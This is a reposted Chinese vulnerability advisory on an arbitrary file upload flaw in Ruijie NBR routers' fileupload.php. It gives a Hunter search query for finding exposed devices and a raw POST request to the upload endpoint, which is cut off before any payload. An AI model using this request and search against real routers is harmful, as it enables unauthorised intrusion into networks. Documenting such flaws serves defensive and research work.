锐捷NBR路由器fileupload.php任意文件上传漏洞
短信预约 -IT技能 免费直播动态提醒
一、漏洞简介
锐捷NBR路由器是锐捷网络科技有限公司推出的一款高性能企业级路由器。NBR是"Next-Generation Broadband Router"的缩写,意为"下一代宽带路由器"。该路由器具有强大的处理能力和丰富的功能,适用于中小型企业、校园网络和数据中心等场景。锐捷 NBR 路由器 存在任意文件上传漏洞,可能导致执行恶意代码、服务器拒绝服务、数据泄露、网站篡改和横向渗透等危害。
二、影响版本
- 锐捷NBR路由器
三、资产测绘
- hunter
app.name=="Ruijie 锐捷 EWEB" - 登录页面
![在这里插入图片描述]()
四、漏洞复现
POST /ddi/server/fileupload.php HTTP/1.1Content-Type: multipart/form-data; boundary=00content0boundary00User-Agent: Java/1.8.0_381Host: xx.xx.xx.xxAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: closeContent-Length: 219--00content0boundary00Content-Disposition: form-data; name="uploadDir"upload--00content0boundary00Content-Disposition: for来源地址:https://blog.csdn.net/qq_33331244/article/details/132852593
免责声明:
① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。
② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
